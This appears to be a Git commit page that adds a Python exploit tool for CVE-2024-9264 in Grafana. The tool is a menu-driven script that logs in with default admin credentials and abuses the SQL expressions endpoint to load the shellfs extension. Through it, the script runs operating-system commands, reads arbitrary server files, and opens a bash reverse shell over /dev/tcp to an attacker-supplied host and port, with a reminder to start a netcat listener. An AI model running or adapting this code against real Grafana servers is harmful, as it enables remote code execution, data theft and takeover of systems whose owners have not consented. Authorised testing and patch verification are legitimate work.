peregr1nus/seckrity-cve
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

File Renamed

Browse Source
This commit is contained in:
Ubuntu
2025-11-05 13:58:08 +00:00
parent 10c5bf252c
commit 7028e15759
2 changed files with 26 additions and 33 deletions
Download Patch File Download Diff File Expand all files Collapse all files

264
CVE-2024-9264/CVE-2024-9264_Tool.py Normal file
View File

@@ -0,0 +1,264 @@
#!/usr/bin/env python3
import requests
import sys
import logging
from psycopg2.extensions import adapt
from typing import List, Optional, Any
from colorama import Fore, init
from packaging.version import Version, InvalidVersion
init(autoreset=True)
# -------------------------
# 프롤로그
# -------------------------
print(r"""
██╗ ██╗██╗███████╗██╗ █████╗
██║ ██╔╝██║██╔════╝██║██╔══██╗
█████╔╝ ██║███████╗██║███████║
██╔═██╗ ██║╚════██║██║██╔══██║
██║ ██╗██║███████║██║██║ ██║
╚═╝ ╚═╝╚═╝╚══════╝╚═╝╚═╝ ╚═╝
Edited by : secKrity - 이민준
CVE ID : CVE-2024-9264
Base Score : 9.4 / CRITICAL
Affected product : Grafana
Vulnerable version : • v < 11.0.5+security-01
• v < 11.0.6+security-01
• v < 11.1.6+security-01
• v < 11.1.7+security-01
• v < 11.2.1+security-01
• v < 11.2.2+security-01
""")
# -------------------------
# 로깅 설정
# -------------------------
logging.basicConfig(
filename="grafana_exploit.log",
level=logging.INFO,
format="%(asctime)s - %(message)s",
)
def log_event(event: str, url: str = "", payload: str = ""):
logging.info(f"EVENT={event} URL={url} PAYLOAD={payload}")
# -------------------------
# 유틸: 컬러 출력
# -------------------------
def info(msg: str):
print(Fore.YELLOW + "[*] " + msg)
def success(msg: str):
print(Fore.GREEN + "[+] " + msg)
def vuln(msg: str):
print(Fore.RED + "[-] " + msg)
def error(msg: str):
print(Fore.RED + "[!] " + msg)
# -------------------------
# Grafana Exploit 클래스
# -------------------------
class GrafanaExploit:
def __init__(self, base_url, user="admin", password="admin"):
self.base_url = base_url.rstrip("/")
self.session = requests.Session()
self.user = user
self.password = password
def get_version(self) -> str:
urls = ["/api/health", "/api/frontend/settings"]
for path in urls:
url = self.base_url + path
try:
r = self.session.get(url, timeout=5)
log_event("version_check", url)
if r.status_code == 200:
data = r.json()
if "version" in data:
return data["version"]
if "buildInfo" in data and "version" in data["buildInfo"]:
return data["buildInfo"]["version"]
except Exception as e:
error(f"Version Check Failed: {e}")
return "Unknown"
def login(self) -> bool:
url = self.base_url + "/login"
data = {"user": self.user, "password": self.password}
try:
r = self.session.post(url, json=data)
log_event("login_attempt", url, str(data))
if r.status_code == 200 and "Logged in" in r.text:
return True
except Exception as e:
error(f"Login Failed: {e}")
return False
def run_query(self, query: str) -> Optional[List[Any]]:
url = self.base_url + "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
payload = {
"from": "1729313027261",
"to": "1729334627261",
"queries": [
{
"datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
"expression": query,
"hide": False,
"refId": "B",
"type": "sql",
"window": "",
}
],
}
try:
r = self.session.post(url, json=payload)
log_event("run_query", url, query)
return r.json()["results"]["B"]["frames"][0]["data"]["values"]
except Exception:
return None
def check_vuln(self):
tmp_file = "/tmp/grafana_id"
query = (
"SELECT 1;"
"install shellfs from community;"
"LOAD shellfs;"
f"SELECT * FROM read_csv('id >{tmp_file} 2>&1 |')"
)
self.run_query(query)
return self.read_remote_file(tmp_file)
def read_remote_file(self, filepath: str) -> Optional[bytes]:
escaped_filename = adapt(filepath)
query = f"SELECT content FROM read_blob({escaped_filename})"
result = self.run_query(query)
if result:
content = result[0][0]
try:
decoded = content.encode("utf-8").decode("unicode_escape").encode("latin1")
return decoded
except Exception:
return content.encode()
return None
def reverse_shell(self, lhost: str, lport: int):
tmp_file = "/tmp/grafana_rs"
cmd = f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\""
query = (
"SELECT 1;"
"install shellfs from community;"
"LOAD shellfs;"
f"SELECT * FROM read_csv('{cmd} >{tmp_file} 2>&1 |')"
)
self.run_query(query)
return None
# -------------------------
# 메뉴 실행
# -------------------------
def menu():
print("\n[ Menu ]")
print("1) Version Check")
print("2) Vuln Check")
print("3) Exploit")
print("4) Exploit with Reverse Shell")
print("5) Exit")
if __name__ == "__main__":
if len(sys.argv) < 2:
error(f"Usage: {sys.argv[0]} <url>")
sys.exit(1)
url = sys.argv[1]
info("Taget URL: " + url)
exploit = GrafanaExploit(url)
while True:
menu()
choice = input(">> ")
if choice == "1":
log_event("Version Check Started")
info("Checking Grafana Version...")
ver = exploit.get_version()
vuln("Grafana Version: " + ver)
elif choice == "2":
log_event("Vuln Check Started")
ver = exploit.get_version()
info("Current Grafana Version: " + ver)
# CVE-2024-9264 영향/패치 버전 목록
patched_versions = [
"11.0.5+security-01",
"11.0.6+security-01",
"11.1.6+security-01",
"11.1.7+security-01",
"11.2.1+security-01",
"11.2.2+security-01",
]
vulnerable_start = "11.0.0"
try:
curr = Version(ver)
vs = Version(vulnerable_start)
min_patched = min(Version(v) for v in patched_versions)
if curr < vs:
success(f"{ver} is not vulnerable to CVE-2024-9264")
elif curr >= min_patched:
success(f"{ver} is not vulnerable to CVE-2024-9264")
else:
vuln(f"{ver} is vulnerable to CVE-2024-9264")
except InvalidVersion:
error(f"Version parse failed: {ver}")
elif choice == "3":
log_event("Exploit Started")
info("Trying to Login...")
if exploit.login():
info("Login Success")
info("Exploit...")
output = exploit.check_vuln()
if output:
vuln("Exploit Success (id Result):")
print(output.decode(errors="ignore"))
else:
success("Exploit is not working")
else:
error("Login Failed")
elif choice == "4":
log_event("Exploit with Reverse Shell Started")
info("Trying to Get Reverse Shell...")
if exploit.login():
info("Login Success")
lhost = input("Attacker IP (LHOST): ")
lport = input("Attacker PORT (LPORT): ")
try:
lport = int(lport)
info(f"Trying to Connect Reverse Shell ({lhost}:{lport})")
info(f"Attacker must be running `nc -lvnp {lport}` Command")
exploit.reverse_shell(lhost, lport)
vuln("Reverse Shell Query Transmission Success.")
except Exception as e:
error(f"Reverse Shell not working: {e}")
else:
error("Login Failed")
elif choice == "5":
log_event("Exit Started")
info("Exiting...")
break
else:
error("Wrong Input")